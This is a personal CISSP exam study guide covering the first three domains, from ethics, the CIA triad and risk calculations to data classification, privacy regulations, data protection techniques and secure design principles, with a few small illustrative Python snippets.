CISSP Note (Original)


Cybercrime statistics are escalating, both in scale and complexity. There were 493.33 million ransomware attacks worldwide in 2022 alone. The rate of cybercrime increased by 600% during the COVID-19 pandemic. Ransomware accounts for 10% of all breaches, while phishing is another common attack vector behind data breaches that cost billions of dollars annually.

Top ransomware attack statistics of 2023


 The average cost of a ransomware attack was $1.85 million.
 By 2031, statistics predict, a ransomware attack will take place every 2 seconds.
 In the last five years, ransomware attacks have increased by 13%, according to Verizon's 2022 Data Breach Investigations Report.
 Nearly 236.7 million ransomware attacks occurred worldwide in the first half of 2022.
 10% of breaches are due to ransomware.
 Ransomware breaches took 49 days longer than the norm to find and contain.
In the post-pandemic digital age, thanks to technologies like cloud computing, AI, machine learning, and data analytics, the majority of firms conduct their business online, which instantly connects them to every part of the globe. While this connectivity allows businesses to operate from anywhere, it also increases the likelihood of hackers exploiting weak security systems and gaining access to crucial data, most often targeting banking and financial services.
As the importance of cybersecurity grows, businesses are investing heavily in it and looking for specialists who can help them reduce risk, prevent fraud, and secure their future.
One of the most coveted, vendor-neutral and globally recognized certifications in the cybersecurity industry is the CISSP — Certified Information Systems Security Professional, offered by the cybersecurity professional organization ISC2. The CISSP certification is often said to be "a mile wide and an inch deep". It validates the skills and knowledge of security professionals in designing, developing and managing a cybersecurity program.
Nevertheless, obtaining this certification is not a simple task. To fully explore the vast and constantly changing
field of cybersecurity, one needs to invest time, energy, and a commitment to learn.
UK NARIC, the UK's designated national agency responsible for providing information and expert guidance on qualifications from all over the world, has deemed the CISSP certification comparable to a Level 7 (Master's degree) qualification, a benchmark recognized both in the UK and across Europe.
According to the most recent ISC2 website update, there are only 159,679 CISSPs worldwide as
of March 2023, with the United States accounting for 95,243 of those, the United Kingdom for
8486, Canada for 6842, China for 4136, Japan for 3699, India for 3364, Australia for 3305,
Singapore for 2963 and Israel for 434.
Welcome, I'm Hemant Patkar, a Cybersecurity Professional working for a prominent consulting firm in London. I'm a member of the information security team of a leading bank in the UK, with experience across various sectors in the UK, the Nordic region, wider Europe, and India; for more details please visit my LinkedIn profile [Link]. I am here to support you in obtaining your CISSP certification, with the goal of explaining each domain in a concise and easily understandable manner, helping you not only prepare for the exam but also deepen your understanding and excel in the field of cybersecurity.
Although you can use these notes as a study guide, I also recommend that you read books and attempt as many practice questions as you can before taking the exam.
These notes were created while I was preparing for the CISSP exam, which I cleared on the first attempt on October 12, 2022. In a world of endless internet resources, these brief notes were distilled from: Mike Chapple's 26-hour "Prepare for CISSP" LinkedIn video course, the entire 9th edition of the ISC2 CISSP Official Study Guide by Mike Chapple, Prabh Nair Coffee shots, Prashant Mohan memory palace, the 8th edition of the CISSP All-in-One Exam Guide by Shon Harris, Luke Ahmed's book "How To Think Like A Manager," study inputs from a few good friends who had already earned their CISSP, and roughly 4,500 practice questions. Anyone studying for this difficult exam and wanting to learn about information security will find these notes straightforward and simple to understand.
The CISSP certification exam covers eight distinct domains, each representing a specific aspect of information
security. These domains are outlined as follows:

1. Security And Risk Management (15% of the exam)


It covers key topics such as establishing and administering security governance, conducting risk analyses, and complying with legal and regulatory requirements. It includes -
 The confidentiality, integrity, and availability of information;
 Security governance principles
 Compliance requirements
 Difficulties with information security law and regulation
 IT policies and procedures
 Risk-based management concepts

2. Asset Security (10% of the exam)


This domain deals with protecting information and assets, including the proper handling, classification, and
disposal of sensitive data. It includes -
 Managing requirements
 Data security restrictions
 Safeguarding privacy
 Asset’s retention
 Categorization and possession of data

3. Security Architecture And Engineering (13% of the


exam)
Here, the focus is on designing and implementing security systems and architectures, considering security
principles, secure design principles, and secure hardware and operating systems. It includes -
 Engineering processes using secure design principles.
 Fundamental concepts of security models
 Security capabilities of information systems
 Assessing and mitigating vulnerabilities in systems
 Cryptography
 Designing and implementing physical security

4. Communications and Network Security (13% of the


exam)
This domain covers the secure design, implementation, and management of network infrastructure, ensuring the confidentiality, integrity, and availability of data in transit. It includes -
 Protecting network parts
 Protecting communication channels
 The use of layout values in network design and their protection

5. Identity and Access Management aka IAM (13% of


the exam)
It involves managing user identities, enforcing access controls, and implementing identity and access
management systems to ensure appropriate access to resources. It includes -
 Physical and logical access to assets
 Identification and authentication
 Integrating third-party identity services and Identity as a Service (IDaaS)
 Authorization mechanisms
 The identity and access provisioning lifecycle

6. Security Assessment and Testing (12% of the exam)


This domain covers techniques and tools for assessing and testing security controls, identifying vulnerabilities,
and ensuring the effectiveness of security measures. Topics include:
 Vulnerability assessment and penetration testing
 Disaster recovery
 Business continuity plans
 Awareness training for clients

7. Security Operations (13% of the exam)


Here, the focus is on managing the security operations, including incident response, disaster recovery, and
implementing and monitoring security controls. It includes:
 Understanding and supporting investigations
 Requirements for investigation types
 Logging and monitoring activities
 Securing the provision of resources
 Foundational security operations concepts
 Applying resource protection techniques
 Incident management
 Disaster recovery
 Managing physical security
 Business continuity

8. Software Development Security (10% of the exam)


This domain integrates security into the software development lifecycle, including secure coding practices,
security testing, and secure deployment. This includes -
 Performing risk and hazard evaluation
 Detecting weaknesses in source code
By studying and mastering these eight domains, CISSP candidates can develop a comprehensive understanding
of information security and prepare themselves for the CISSP certification exam and for industry.
CISSP: Domain 1 Part 1— Security And Risk
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
e51142f33603

OBJECTIVE

PART 1

ISC2 CODE OF ETHICS


SECURITY CONCEPTS
GOVERNANCE, RISK AND COMPLIANCE (GRC)
BUDGET (FUNDING)
ORGANIZATION STRUCTURE / PROCESS
REPORTING MODEL
CONTROL FRAMEWORK
LIABILITY
COMPLIANCE

ISC2 CODE OF ETHICS


(Understand, adhere, and promote professional ethics)
A) ISC2 Code of professional ethics

B) Organizational Code of ethics

* ISC2 Code of professional ethics supports Organizational code of ethics *

ISC2 member is expected to do the following (Remember with PAPA)

1. Protect society, the common good, necessary public trust and confidence,
and the infrastructure.
2. Act honourably, honestly, justly, responsibly, and legally.
3. Provide diligent and competent service to principals.
4. Advance and protect the profession.

SECURITY CONCEPTS
CONFIDENTIALITY (Disclose) — Only authorised entities have access to the data, resources, and objects. A lock on a safe provides confidentiality. Secrecy is maintained.
Controls: Least privilege, Need to know, Access control and Encryption.
Example: Reputed banks maintain confidentiality by NOT disclosing customer data.
Common attacks: Social engineering, Monitoring and Eavesdropping, Theft and Burglary.

———————————————————————————————

INTEGRITY (Alter) — Protects data from unauthorized changes, preserving accuracy and completeness. Financial services data is a prime example where integrity matters most. A HASH function is used to verify that data has not changed.
Controls: Hash, Checksum, Dual control, and Digital Signature.
Example: Ordering sealed food from Uber Eats or Just Eat.
Common attacks: Software bugs, Data modification, Malicious code.
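The hash-based integrity check mentioned above can be illustrated with a minimal sketch using Python's standard hashlib module (the message and digest values are hypothetical):

```python
import hashlib

def sha256_digest(data: bytes) -> str:
    """Return the SHA-256 hex digest of the given bytes."""
    return hashlib.sha256(data).hexdigest()

original = b"Transfer $700 to account 12345"
stored_digest = sha256_digest(original)        # computed and stored at write time

received = b"Transfer $700 to account 12345"   # data read back later / received
if sha256_digest(received) == stored_digest:
    print("Integrity verified: data has not changed")
else:
    print("Integrity violation: data was altered")
```

Any single-bit change in the data produces a completely different digest, which is why hashes (and keyed variants such as MAC/HMAC, covered in Domain 3) are standard integrity controls.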

——————————————————————————————

AVAILABILITY (Destruct) — Data should be available to authorised users always / whenever required.
Controls: RAID, Load Balancer, Backups, HA, and Remote site.
Example: Content Delivery Networks such as those used by Netflix and Amazon Prime.
Common attacks: Natural disaster, DDoS and Physical attacks.
GOVERNANCE
Process to manage organization which includes roles, policies and procedures to
make informed decisions.

Strategy: 3–5 Years, Tactical: 1–3 Years and Operational: 0–6 Months

Enterprise Governance (Corporate) — Board of Directors has 4 major parts

1. Business Governance — COO


2. Finance Governance — CFO
3. IT Governance — CIO
4. Security Governance — CISO
Security Governance
Executive management, comprising the Board of Directors, is in charge and establishes a direction to guide strategy and policy.

It provides resources to security initiatives and includes security guidelines or practices that lower risk to a manageable level.

*** Security is a Non-Functional Requirement because it is a Process ***

Good Governance requirement

1. To support organizational goals, IT/security strategy should be aligned with business strategy.
2. Control and reduce risk to a reasonable level.
3. Describe and control resources.
4. Analyse performance indicators in relation to organizational goals.
5. Deliver value through information security investments that are optimized and support organizational goals.

-> Security should exist to support the Mission, Vision and Business objectives of the organization.

-> There should be senior leadership support.

-> Integrate risk management across all processes.

-> Infosec management validates that appropriate policies, procedures, standards, and guidelines are implemented to ensure business operations are conducted at an acceptable risk level.

GOVERNANCE, RISK AND COMPLIANCE (GRC)

*** Governance Process-Security steps ***


1. Stakeholder Interest.
2. Goals & Objectives.
3. Infosec policy, guidelines, and procedures.
4. Infosec program implementation.
5. Level of implementation.
6. Program result.
7. Business mission impact.

*** Risk Capacity vs Risk Tolerance vs Risk Appetite ***

Framework comes before standards

Budget (Funding) -> Driving factor for any organization

1. Staff count.
2. Staff qualification.
3. Level of security controls required.
4. Task to be performed.
5. Regulations to be met.
6. Training required.
7. Degree of metric tracking.

Organization Structure / Process

REPORTING MODEL
CISO should report as high as possible in organization because:

1. To maintain visibility of the importance of the Infosec.


2. Limit disturbance or inaccurate translation of message.
Different model of reporting for Security Officer (CISO)

1. To CEO -> Best
2. To CIO/CTO (IT Department) -> 2nd Best
3. To COO (Admin/HR) -> 3rd Best
4. To Insurance and risk department.
5. To Internal audit department -> does not take any department under it, due to conflict of interest.
6. To legal department -> limited to some legal aspects.
CONTROL FRAMEWORK

Framework is planning to have an office, while Standard is buying & arranging items within a specific budget, such as a desk, chair, etc.

LIABILITY

DUE CARE (DC) — (Corrective Control) -> Duty (Action)

The level of care that a prudent person would have used in the same or similar circumstances is known as "Due Care." It is what the company owes the client.

Action taken by an organization to protect its stakeholders, investors, employees and customers from harm.

DUE DILIGENCE (DD) — (Detective Control) -> Verify (Checks)

Before entering into a contract, it is customarily necessary to perform Due Diligence on a company or individual. It is any action carried out to demonstrate or provide appropriate care.

Act of Investigation, Verification and Gap Assessment

Example

DUE CARE — Collecting data / Implementing a patch (Always 1st)

DUE DILIGENCE — Verifying data / Verifying the patch (After DC)

COMPLIANCE
Act of faithfully following an external mandate.

Law = To protect the interests of individuals.

Regulations = To control industries (Bank of England, RBI, Federal Reserve Bank, DFSA, SEBI).

Privacy = Individual while Secrecy = Organization

Review the brief explanation of Domain 1 below for a last-minute overview — by Destination Certification

Upcoming Domain 1 PART 2 Agenda

REGULATION SUMMARY
INTELLECTUAL PROPERTY (IP) Protection
EXPORT/IMPORT RESTRICTION
DRM (DIGITAL RIGHTS MANAGEMENT)
SECURITY POLICY, STANDARDS, PROCEDURES AND GUIDELINES
PERSONNEL SECURITY POLICIES
SECURITY EDUCATION, TRAINING AND AWARENESS
RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT
QUALITATIVE RISK ASSESSMENT
QUANTITATIVE RISK ASSESSMENT
RISK RESPONSE
ACCESS CONTROLS
VAPT
THREAT MODELLING (STRIDE,NIST and PASTA)
BCP / DR
CISSP: Domain 1 Part 2— Security And Risk
Management : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
49bbf1065d71

OBJECTIVE

PART 2

REGULATION SUMMARY
INTELLECTUAL PROPERTY (IP) Protection
EXPORT/IMPORT RESTRICTION
DRM (DIGITAL RIGHTS MANAGEMENT)
SECURITY POLICY, STANDARDS, PROCEDURES AND GUIDELINES
PERSONNEL SECURITY POLICIES
SECURITY EDUCATION, TRAINING AND AWARENESS
RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT
QUALITATIVE RISK ASSESSMENT
QUANTITATIVE RISK ASSESSMENT
RISK RESPONSE
ACCESS CONTROLS
VAPT
THREAT MODELLING (STRIDE,NIST and PASTA)
BCP / DR

REGULATION SUMMARY

1. PCI-DSS (Payment Card Industry Data Security Standard) — Protecting against credit card theft / fraud ….. (It's a STANDARD)

American Express, Discover Financial Services, JCB International, MasterCard,


and Visa Inc. founded the Payment Card Industry Security Standards Council
with the intention of supervising the continued development of the Payment Card
Industry Data Security Standard.

2. HIPAA (Health Insurance Portability and Accountability Act) — Health care data privacy.

It is a US law applicable to covered entities (the HITRUST framework is commonly used to assess compliance with it).

3. GLBA (Gramm-Leach-Bliley Act) — (For Consumer/Individual) …… (It's a US LAW)

Protects individuals' financial data.

4. SOX (Sarbanes–Oxley Act) — (For Corporate / Enterprise integrity)

Fraudulent accounting to safeguard investors

5. Privacy Shield — An EU–US framework for transatlantic transfers of personal data.

INTELLECTUAL PROPERTY (IP) PROTECTION


Industrial — Invention, Trademark, Industrial design

Copyright — Literary works, artwork.

COPYRIGHT — 70 years after Death, 95 years after Publication and 120 years after Creation

Copyright protects the expression of an idea rather than the concept itself — for example, a piece of music expressing feelings of hurt or love.
E.g. — Creating music or a song in a particular way is protected by Copyright

TRADE SECRETS

Provide the company with some type of competitive value or advantage.

E.g. — The recipe of a major soft-drink brand, McDonald's or KFC

PATENT — 20 YEARS

This is the strongest form of protection for a unique idea or invention.

E.g. — A novel process or algorithm implemented in an application

TRADEMARK — (Identifying a business)

This is to protect Goodwill, Name, Symbol etc.

TM — In process (takes 6 months to 1 year for approval)

® — Approved (Registered)

EXPORT/IMPORT RESTRICTION

Export Restrictions:

Wassenaar Arrangement: This limits the export of conventional arms and dual-use goods and technologies whose accumulation could endanger regional and international security and stability.

Import Restrictions:

Laws governing the import of commodities, data, etc.

DRM (Digital Rights Management)


This solution regulates the transfer of intellectual property. DRM is frequently combined with DLP (Data Leak Prevention).
Data in Transit — Yes

Data in Use — Yes

Data at Rest — No

DRM’s primary function is to safeguard IP.

E.g: Netflix and its controls

SECURITY POLICY, STANDARDS, PROCEDURES AND


GUIDELINES
Policy = Written aspect of governance / Intent of senior management / To be reviewed yearly

Senior management is responsible for policy approvals.


Example 1

Policy = Using a password that is encrypted.

Standard = 8 character long

Procedure = Step by step process

Baseline = 128 bit size

Guideline = Do not share

PERSONNEL SECURITY POLICIES

1. Employee screening — Job descriptions, reference checks, examinations


of credentials (education and certifications), and background checks.
2. Vendor consultation and contractor controls.
3. Employee agreement and policies — Code of conduct, gift handling,
ethics statement, non-disclosure, non-compete (cannot work for
competitor), and acceptable use.
4. Employee Termination policies.
5. Privacy.

Separation of Duties (SoD)

This is the main control to AVOID fraud, since it prevents one individual from being able to complete all steps of a procedure (see the sketch below).

Person1 -> Creates Purchase Order

Person2 -> Signs Cheque

Person3 -> Authorizes and Passes
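A minimal sketch of how an application could enforce this rule: a step is rejected if the same person already performed an earlier step of the workflow (the function name and workflow steps are hypothetical):

```python
# Hypothetical purchase-order workflow enforcing Separation of Duties.
WORKFLOW_STEPS = ["create_po", "sign_cheque", "authorize_payment"]

def record_step(history: dict, step: str, user: str) -> None:
    """Record that `user` performed `step`, enforcing SoD across the workflow."""
    if user in history.values():
        raise PermissionError(f"SoD violation: {user} already performed another step")
    history[step] = user

history = {}
record_step(history, "create_po", "alice")
record_step(history, "sign_cheque", "bob")
# record_step(history, "authorize_payment", "alice")  # would raise PermissionError (SoD violation)
record_step(history, "authorize_payment", "carol")    # OK: three different people
```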

Mandatory Vacations

This is primarily to DETECT fraud

Job Rotations (People movement)

This is to PREVENT fraud — it decreases the likelihood of collusion between people.

Termination

1. Lock user account.


2. Recover property (Laptop, Desktop etc).
3. Exit interview.
4. Review NDA.

Onboarding

1. Review contract terms and Job description.


2. Sign NDA.
3. Training.
4. Process and Policies awareness.

ESTABLISH AND MANAGE SECURITY EDUCATION, TRAINING AND AWARENESS
Policy — Specify what to do.

Education — Modify Career. ( Formal Class — Long Term)

Training — Upgrade/Boost skills. (Semi Formal — Mid Term)


Awareness — Alter behaviors. (Information — Short Term)

CORE AREAS
Program Effectiveness Evaluation — depends upon:

1. Participant testing.
2. Penetration testing.
3. Log review.

Periodic Content Reviews

1. Security Tools.
2. Applicable Laws.
3. Organization Security Policy.
4. Recent attack styles and methodologies

A sign of the best awareness training — as security awareness increases, incident reporting increases.

RISK MANAGEMENT
UNDERSTANDING AND APPLY RISK MANAGEMENT.
Risk — It is the end result of the functions of threat, vulnerability, event likelihood, and the probable organizational effects of an event.

Threat — Action (malicious actors)

Vulnerability — A flaw / weakness

Impact — Potential harm

Risk (event to occur) = Vulnerability (exposure) + Threat source (intentional / unintentional)

RISK = IMPACT x LIKELIHOOD x THREAT

(Likelihood and impact are the factors that determine risk)


LIKELIHOOD DETERMINATION

Determine the likelihood that each threat can exploit a vulnerability.

Determine how the value of the affected asset will be diminished.

Definitions of impact to an organization often include loss of:

1. Life
2. Dollars $$
3. Prestige
4. Market share

Threats and Vulnerabilities

Natural, Criminal, Software, Physical, Personal, User Error (Unskilled worker)

QUALITATIVE RISK ASSESSMENT (Low, Med, High)


Organizations use qualitative risk assessment in 70–80% of cases. The best example is an internal audit (a small matrix sketch follows below).
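Qualitative ratings are typically combined in a likelihood x impact matrix. A minimal sketch, where the rating scale and thresholds are illustrative assumptions rather than a prescribed standard:

```python
# Illustrative 3x3 qualitative risk matrix: likelihood x impact -> risk rating.
LEVELS = {"Low": 1, "Medium": 2, "High": 3}

def qualitative_risk(likelihood: str, impact: str) -> str:
    """Map qualitative likelihood and impact ratings to an overall risk rating."""
    score = LEVELS[likelihood] * LEVELS[impact]
    if score >= 6:
        return "High"
    if score >= 3:
        return "Medium"
    return "Low"

print(qualitative_risk("High", "Medium"))   # -> High
print(qualitative_risk("Low", "Medium"))    # -> Low
```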

Condition of Qualitative Risk Assessment

1. A lack of competence among risk assessors.


2. There is not much time to finish the risk assessment.
3. Insufficient or limited data available.
4. Available assessors are seasoned workers with extensive knowledge of
crucial business and IT systems.

QUANTITATIVE RISK ASSESSMENT ($$)

Consider a virus attack on a database server hosting critical data.

1. Asset Value (AV) of database server = $1000
2. Exposure Factor (EF) to the threat, i.e. virus attack = 70% of server data lost
3. Single Loss Expectancy (SLE) = AV x EF = $1000 x 70% = $700
4. Annualized Rate of Occurrence (ARO) = 4 times a year
5. Annualized Loss Expectancy (ALE) = SLE x ARO = $700 x 4 = $2800

Always take decisions based on ALE, not SLE (a worked sketch follows below).
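A minimal sketch of the same calculation, useful for comparing ALE against the annual cost of a proposed control (the control cost is a hypothetical figure; the other values come from the example above):

```python
def sle(asset_value: float, exposure_factor: float) -> float:
    """Single Loss Expectancy = Asset Value x Exposure Factor."""
    return asset_value * exposure_factor

def ale(single_loss: float, aro: float) -> float:
    """Annualized Loss Expectancy = SLE x Annualized Rate of Occurrence."""
    return single_loss * aro

av, ef, aro = 1000.0, 0.70, 4            # example values from the note above
loss_per_event = sle(av, ef)             # $700
annual_loss = ale(loss_per_event, aro)   # $2800

control_cost_per_year = 1500.0           # hypothetical annual cost of a countermeasure
print(f"SLE=${loss_per_event:.0f}, ALE=${annual_loss:.0f}")
print("Control is cost-justified" if control_cost_per_year < annual_loss else "Not justified")
```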


RISK RESPONSE
CONSIDERATION FOR SELECTION OF CONTROLS

1. Strong business justification for security measures, i.e. they must be cost-effective.
2. Cost-benefit evaluation.
3. Return on security investment.
4. The risk assessment team must evaluate the security controls' functionality and effectiveness.
5. You must take operational impact, cost effectiveness, and security effectiveness into account while choosing countermeasures.

ACCESS CONTROLS

SECURITY CONTROL CATEGORIES


Vulnerability Assessment and Penetration Testing
(VAPT)
VA — Only identifies vulnerabilities / weaknesses

PT — Exploits vulnerabilities

As a CISO, you should have a limited set of configuration templates and a complete asset inventory (1 configuration template for 100 servers, not 100 servers with 100 different configurations).

VAPT Steps

THREAT MODELLING (STRIDE,NIST and PASTA)


Scope — Network, System, Application and Data.

1. Identify threat agents and possible threats.


2. Understand current controls.
3. Identify exploitable vulnerabilities.
4. Prioritize identified risks.
5. Identify controls to reduce risks to acceptable levels.

Threat modelling @ design stage before build

STRIDE (Spoofing, Tampering, Repudiation, Info Disclosure, DoS and Elevation of Privilege) — Developed by Microsoft

Microsoft's STRIDE methodology seeks to guarantee that an application satisfies the security properties of Confidentiality, Integrity, and Availability (CIA) in addition to Authorization, Authentication, and Non-Repudiation (see the mapping sketch below).
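The usual one-to-one mapping between each STRIDE threat category and the security property it violates, expressed as a small lookup table (a study aid, not part of any official tooling):

```python
# STRIDE threat category -> security property it violates.
STRIDE = {
    "Spoofing":               "Authentication",
    "Tampering":              "Integrity",
    "Repudiation":            "Non-repudiation",
    "Information Disclosure": "Confidentiality",
    "Denial of Service":      "Availability",
    "Elevation of Privilege": "Authorization",
}

for threat, prop in STRIDE.items():
    print(f"{threat:<24} violates {prop}")
```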
NIST (National Institute of Standards and Technology)

PASTA (Process for Attack Simulation and Threat Analysis)

PASTA threat modelling combines an attacker's perspective of a business with risk and impact analysis to create a complete picture of the threats to products and applications and their vulnerability to attack, informing decisions about risk and priorities for fixes.

RISK MANAGEMENT METHODOLOGIES

1. Governance review — Process, Certifications.


2. Site security reviews — Client visit.
3. Formal security audit — End to end audit.
4. Penetration testing — Planning to use product/cloud platform.

REGULAR 3RD PARTY ASSESSMENT

1. On-site assessment.
2. Document exchange and review.
3. Process / Policy review.
SLA vs ASSURANCE vs SLR

Service Level Requirement (SLR)

Service Level Agreement (SLA)

BUSINESS CONTINUITY PLANNING (BCP) AND


DISASTER RECOVERY (DR)
BCP (Business Continuity Plan) — For the Business

The documentation of a predetermined set of instructions or procedures that describes how a company's business operations will continue to function in the event of a major disruption.

DR (Disaster Recovery) — For Systems / IT Infrastructure

A defined strategy for recovering one or more information systems at a different location in the event of a significant hardware or software failure.
BIA — (Business Impact Analysis)

Things to do if any change in business applications.

1. Develop contingency policy.


2. Conduct BIA.
3. Identify preventive controls.
4. Create contingency strategies.
5. Develop contingency plan.
6. Plan, Testing, Training and Exercise.
7. Plan maintenance.

MTD — Maximum Tolerable Downtime (acceptable downtime agreed with the customer without significant harm to the business)

RTO — Recovery Time Objective (time to restore services, e.g. from a secondary DC)

RPO — Recovery Point Objective (acceptable data loss). This only deals with data and its backup.

WRT — Work Recovery Time (back to the primary DC)


CISSP: Domain 2 — Asset Security : Easy
Notes to Pass CISSP Certification in 2023–24
[Link]
6f96c01d4134

OBJECTIVE
INFORMATION AND ASSET (IDENTIFY AND CLASSIFY)
ASSET LIFECYCLE
INFORMATION AND ASSET OWNERSHIP
PROTECT PRIVACY
ASSET RETENTION (EOL and EOS)
DATA SECURITY CONTROLS
INFORMATION AND ASSET HANDLING REQUIREMENTS
DATA REMANENCE

INFORMATION AND ASSET


Asset = Anything that generates value; the level of control is determined based on the asset's value.

Q) Why is asset classification required?

Answer: So that the asset will receive an appropriate level of protection.

Classification (deals with access) and Categorization (deals with impact)

SENSITIVITY = Amount of damage caused by information disclosure (PII or PHI)

CRITICALITY = Revenue-driven loss (e.g. disconnection of Zoom or GoToMeeting hosted in the cloud)

MILITARY

 Top secret —Intelligence in communications and cryptography


 Secret — Few military strategies
 Confidential — Information on the power of the ground forces
 Sensitive unclassified — Information marked “For Official Use Only”
 Unclassified — Information that may be made public with permission
COMMERCIAL / BUSINESS

 Sensitive — Intellectual property, PHI protected


 Confidential — Vendor contracts, employee evaluations
 Private — Client names or pictures
 Proprietary — Organizational procedures
 Public —Information that is accessible to everyone

DATA LIFE CYCLE

The individual who owns the data decides its classification.

The data owner should review the classification at least annually.
10 STEP DATA CLASSIFICATION

1) Define classification level.


2) Define criteria how to classify.
3) Identify who will classify data.
4) Identify data custodian.
5) Indicate security controls.
6) Document exceptions.
7) Specify how custody of data is transferred internally.
8) Create a process to review classification periodically.
9) Create a process to declassify data.
10) Incorporate the above into security awareness training.

PROTECT PRIVACY AND DETERMINE AND MAINTAIN


OWNERSHIP

*** Individual should have control over their personal


information ***

Personal information must be:

1) Obtained fairly and lawfully.
2) Used only for the original specified purpose.
3) Adequate, relevant and not excessive for the purpose.
4) Accurate and up to date.
5) Accessible to subjects.
6) Kept secure.
7) Destroyed after its purpose is completed.

CANADA PERSONAL INFORMATION PROTECTION AND ELECTRONIC DOCUMENTS ACT (PIPEDA)

 This is the general privacy regulation in Canada for any company operating in Canada and collecting data of Canadian citizens.

ASIA PACIFIC ECONOMIC CO-OPERATION (APEC) PRIVACY FRAMEWORK

 It is NOT a regulation but a framework.
 Agreed among APEC's 21 member economies.

GENERAL DATA PROTECTION REGULATION (GDPR)

 Applicable to any company, operating in the EU or outside it, that collects and processes data of EU citizens.
 Under GDPR a data breach should be reported within 72 hours.
GDPR 7 Privacy Principles:

DATA OWNER / CONTROLLER— Who owns the Data

DATA CUSTODIAN / PROCESSOR — Cloud Service Provider (Internal IT,


Security, DBA team)

DATA STEWARD— Compliance officer, Privacy officer, Quality officer


(Business)
For US — Data Controller and Data Custodian (remember by C)

For EU — Data Owner and Data Processor

DATA PROTECTION OFFICER (DPO) FOR GDPR

OECD — The Organization for Economic Co-operation and Development is a forum where the governments of 38 democracies with market-based economies work together to create norms for public policy that will support long-term economic progress.

OECD Privacy Guidelines

1) Data collection.
2) Data quality principle.
3) Purpose specific principle
4) Use limitation principle.
5) Security safeguard principle.
6) Openness principle (Disclose how data is managed).
7) Individual participation principle.
8) Accountability principle (You are accountable).

QUALITY ASSURANCE / QUALITY CONTROL (QA/QC)

QC = Quality assessment based on an INTERNAL process to maintain quality.

QA = Quality assessment based on an EXTERNAL process to review QC and maintain quality.

 Prevent the error and correct the error


 Building effective overall archiving and data retention policy

END OF LIFE POLICY (EOL)


Vendor to STOP supporting after EOL

1) Secure disposal of asset and its related data.


2) Time to transition to new platform.
3) Should be made 6 months prior.
4) Data removal / Sanitize before decommissioning the asset after EOL.

DATA SECURITY CONTROLS


1) Baselining.
2) Scoping and Tailoring.
3) Standard selection.
4) Cryptography.

Baseline: The 1st layer of a defense-in-depth approach to network security (i.e. minimum security controls). Establishes a minimum set of safeguards to protect IT infrastructure.

Example: 8-character password, antivirus, etc.

Tailoring: Applied after the baseline for specific use; the modification of controls as per business requirements.

Scoping: Limiting general baseline recommendations by removing those that do not apply.

 Defining the boundary
 Pick the required controls as per need and eliminate the rest

PLAN-DO-CHECK-ACT CYCLE
DATA AT REST (DAR)

Data residing in STORAGE

DAR Protection

1. TPM (Trusted Platform Module)

a) Chip integrated to computer that provide crypto processor (Device Auth)


b) Cryptography keys are incorporated in the device.
Example: Bit Locker
2. SED (Self-Encrypting Drive)

The encryption key is built in but should be stored separately and updated on a regular basis.
Example: Pen drives that use SED

DATA IN TRANSIT
DATA PROTECTION

1. LINK ENCRYPTION (MOST SECURE but SLOW)

a) Encrypts all data along a common path
b) Data + routing header encryption.
c) TUNNEL mode of VPN
d) Provided by the service provider.
e) Encrypted and decrypted at every hop
f) Layer 2

Advantage —
a) All data is encrypted

Disadvantage —
a) Traffic is repeatedly encrypted and decrypted at each node.
b) At each node the data is in the clear and therefore vulnerable.

2. END-TO-END ENCRYPTION (LESS SECURE but FAST)

a) Encrypts only the data
b) TRANSPORT mode of VPN
c) Layer 7

Advantage —
a) E2EE stops messages from being read if intercepted mid-transit.
b) E2EE keeps even the service providers from accessing the messages.

Disadvantage —
a) It only protects the message in transit — once the message reaches its endpoint, it is no longer protected.
b) It does not hide message metadata, such as the time the message was sent and who it was sent to.

DATA IN USE
MASKING: the technique of altering sensitive data so that software or authorised personnel can still use it, but it is of little or no value to unauthorised intruders.

Data de-identification via anonymization

a) Removing information that can be used to identify an individual.
b) Used to protect the confidentiality of sensitive data.

DAM (Digital Asset management) and DLP (Data Leak


Prevention) — Effective when Data in use
TOKENIZATION: the procedure of replacing a sensitive data element with a non-sensitive equivalent, known as a token, that has no inherent or exploitable meaning or value. (POS systems use tokenization; see the sketch below.)

Example: Valet parking gives a TOKEN number in exchange for the car key
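A minimal sketch of the idea: the real card number lives only in a protected vault, and downstream systems see only a random token (the in-memory dict here stands in for what would be a hardened vault service in practice):

```python
import secrets

vault = {}  # token -> real card number; a dict only for illustration

def tokenize(card_number: str) -> str:
    """Replace a card number with a random, meaningless token."""
    token = "tok_" + secrets.token_hex(8)
    vault[token] = card_number
    return token

def detokenize(token: str) -> str:
    """Only the vault can map a token back to the original value."""
    return vault[token]

token = tokenize("4111 1111 1111 1111")
print(token)              # e.g. tok_3f9a1c...; safe to store or log downstream
print(detokenize(token))  # original card number, available only via the vault
```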

DATA PROTECTION

1. 1st step is to Identify and categorize


2. Next step is to label, mark or otherwise classify the type of data to ensure
proper level of protection are employed.

Example: In pdf when we comment = MASKING and


when we colour for future reference = LABEL (Fast Tag in cars = LABEL)

Data Owner assigns LABEL


ASSET IDENTIFICATION

DATA REMANENCE
HDD — Data is magnetically written to the drive by altering a magnetic field.

SSD — Uses flash memory to store data.

Media Sanitization Types

Data deletion techniques are as below

Degaussing (Purging) — For HDD only (disk cannot be reused)

Destruction — For HDD and SSD (disk cannot be reused)

The only solution for SSDs is DESTRUCTION

ANTI REMANENCE TECHNIQUE

CRYPTO SHREDDING / ERASURE (by key destruction)

1. Used for cloud data destruction; it is still a logical process.
2. A logical process is still LESS SECURE than a physical process.
3. The user / data owner can directly delete the encryption key, so cloud personnel can no longer decrypt the data.
4. Upload data to the cloud in encrypted form, so it can effectively be deleted (by destroying the key) when no longer required.
CISSP: Domain 3 — Security Architecture &
Engineering : Easy Notes to Pass CISSP
Certification in 2023–24
[Link]
6685ae748974

OBJECTIVES
PROCESSES USING SECURE DESIGN PRINCIPLES
FUNDAMENTAL CONCEPT OF SECURITY MODELS
SELECT CONTROL BASED UPON SYSTEM SECURITY REQUIREMENTS
SECURITY CAPABILITIES OF INFORMATION SYSTEMS
VULNERABILITIES OF SECURITY ARCHITECTURES, DESIGNS AND
SOLUTION ELEMENTS
CRYPTOGRAPHY
PHYSICAL SECURITY

ENGINEERING PROCESS

1) Discover info protection


2) Define system security requirement
3) Design System Architecture
4) Develop detailed Security design
5) Implement security system
6) Assess effectiveness (working effectively)
Implement And Manage an Engineering Lifecycle Using Secure Design
Principles.
~ Threat modelling
~ Least privilege
~ Defense In Depth
